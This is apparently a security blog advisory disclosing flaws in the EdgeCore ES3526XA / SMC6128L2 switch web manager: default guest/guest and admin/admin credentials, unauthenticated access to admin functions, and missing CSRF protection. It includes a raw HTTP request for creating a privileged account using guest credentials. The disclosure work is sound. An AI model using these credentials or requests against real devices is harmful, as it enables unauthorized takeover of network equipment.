Friday, June 24, 2016

EdgeCore - ES3526XA Manager - Multiple Vulnerabilities

EdgeCore - Layer2+ Fast Ethernet Standalone Switch ES3526XA Manager - Multiple Vulnerabilities

Also rebranded as: SMC TigerSwitch 10/100 SMC6128L2 Manager

Confirmed versions

Object ID:

Switch Information 
Main Board:
Number of Ports 26
Hardware Version R01
Management Software:
Loader Version
Boot-ROM Version
Operation Code Version

Object ID:

Switch Information 
Main Board:
Number of Ports 28
Hardware Version R01
Chip Device ID Marvell 98DX106-B0, 88E6095[F]
Internal Power Status Active

Management Software:
EPLD Version 0.07
Loader Version
Boot-ROM Version
Operation Code Version
Role Master

Other firmware / software versions may also be affected.

Vendor Response: These models are no longer supported.

Vulnerability Details

1. Weak Credentials Management

Guest / guest – priv 0 - read privileges to most device configuration
Admin/admin – priv 15 - read/write access

Mandatory password change not enforced by the application.

2. Access Control Flaws

Any functions can be performed by directly calling the function URL (GET/POST) without any authentication. This includes creating new privileged user(s), changing (admin) passwords, deleting user(s), reading/changing device configuration, rebooting device etc.

+ Guest can also perform any administrative functions such as add,update,delete users 

PoC 1:
For example, anyone can access these urls directly, without any authentication:


PoC 2:
Create a new privileged account:

POST /config/153/user_accounts.htm HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://IP/config/153/user_accounts.htm
Cookie: expires=Fri, 1 Jan 2016 01:33:07 GMT
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 166


Application does not enforce access control correctly.

3. Vulnerable to Cross-Site Request Forgery

There is no CSRF Token generated per page and / or per (sensitive) function. Successful exploitation of this vulnerability can allow silent execution of unauthorized actions on the device such as password change, configuration parameter changes, saving modified configuration, & device reboot.


No comments:

Post a Comment


The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.